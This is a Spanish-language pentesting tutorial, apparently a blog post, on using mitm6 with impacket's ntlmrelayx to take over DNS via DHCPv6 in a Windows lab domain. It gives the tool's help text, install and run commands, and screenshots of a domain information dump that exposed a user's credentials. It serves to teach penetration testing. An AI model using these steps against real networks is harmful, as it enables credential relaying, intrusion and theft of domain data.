DNS Takeover (mitm6) 🧍‍♀️🧍‍♂️🧍‍♀️

 

Sobre la herramienta:

 

mitm6  es una herramienta de pentesting que explota la configuración predeterminada de Windows para hacerse cargo del servidor DNS predeterminado. Lo hace respondiendo a los mensajes de DHCPv6, proporcionando a las víctimas una dirección IPv6 de enlace local y configurando el host de los atacantes como servidor DNS predeterminado. Como servidor DNS, mitm6 responderá selectivamente a las consultas DNS de los atacantes que eligen y redirigirá el tráfico de las víctimas a la máquina atacante en lugar del servidor legítimo. Mitm6 está diseñado para funcionar junto con ntlmrelayx de impacket para la suplantación de identidad de WPAD y la transmisión de credenciales.

 

Uso:


 

usage: mitm6 [-h] [-i INTERFACE] [-l LOCALDOMAIN] [-4 ADDRESS] [-6 ADDRESS] [-m ADDRESS] [-a] [-r TARGET] [-v] [--debug]

             [-d DOMAIN] [-b DOMAIN] [-hw DOMAIN] [-hb DOMAIN] [--ignore-nofqdn]

 

mitm6 - pwning IPv4 via IPv6

For help or reporting issues, visit https://github.com/dirkjanm/mitm6

 

optional arguments:

  -h, --help            show this help message and exit

  -i INTERFACE, --interface INTERFACE

                         Interface to use (default: autodetect)

  -l LOCALDOMAIN, --localdomain LOCALDOMAIN

                         Domain name to use as DNS search domain (default: use first DNS domain)

  -4 ADDRESS, --ipv4 ADDRESS

                         IPv4 address to send packets from (default: autodetect)

  -6 ADDRESS, --ipv6 ADDRESS

                         IPv6 link-local address to send packets from (default: autodetect)

  -m ADDRESS, --mac ADDRESS

                         Custom mac address - probably breaks stuff (default: mac of selected interface)

  -a, --no-ra           Do not advertise ourselves (useful for networks which detect rogue Router Advertisements)

  -r TARGET, --relay TARGET

                        Authentication relay target, will be used as fake DNS server hostname to trigger Kerberos auth

  -v, --verbose         Show verbose information

  --debug               Show debug information

 

Filtering options:

  -d DOMAIN, --domain DOMAIN

                         Domain name to filter DNS queries on (Allowlist principle, multiple can be specified.)

  -b DOMAIN, --blocklist DOMAIN, --blacklist DOMAIN

                         Domain name to filter DNS queries on (Blocklist principle, multiple can be specified.)

  -hw DOMAIN, -ha DOMAIN, --host-allowlist DOMAIN, --host-whitelist DOMAIN

                         Hostname (FQDN) to filter DHCPv6 queries on (Allowlist principle, multiple can be specified.)

  -hb DOMAIN, --host-blocklist DOMAIN, --host-blacklist DOMAIN

                         Hostname (FQDN) to filter DHCPv6 queries on (Blocklist principle, multiple can be specified.)

  --ignore-nofqdn       Ignore DHCPv6 queries that do not contain the Fully Qualified Domain Name (FQDN) option.

 


Ejemplo práctico:

 

En  primer lugar, instalamos mitm6 clonando el repositorio con el siguiente comando:


❯ git clone https://github.com/dirkjanm/mitm6.git


 image

 

Para proceder a su instalación ejecutaremos el comando:


❯ pip3 install .

 

image

 

Ejecutamos mitm6 en nuestro caso hacia el dominio laughtale.local

 

❯ mitm6 -d < nombre de dominio >

 

 Al mismo tiempo ejecutaremos impacket-ntlmrelayx con las opciones -6 (ipv6) -t target -wh WPAD host -l loot directorio de volcado.

 

  ❯ mitm6 -d < nombre_dominio >

image


Reiniciamos el equipo en cuestión.

 

image


image

 

Y empezará a cargar la información.


image

 

Al cabo de un rato nos indicará que se ha realizado el volcado de la información en el directorio al que dimos nombre anteriormente.

 

Si hacemos un listado de nuestro directorio info, podremos ver el volcado.


image

 

Nos posicionamos sobre el directorio en cuestión y abrimos el archivo .html con el navegador para una mejor visualización.


image

 

Como podemos ver a continuación hemos podido sacar de una manera sencilla información sensible del dominio, hemos podido volcar las credenciales que tenía uno de los usuarios en el apartado descripción.


image

 

image

 


 


Licencia de Creative Commons

Este obra está bajo una licencia de Creative Commons Reconocimiento-NoComercial-CompartirIgual 4.0 Internacional.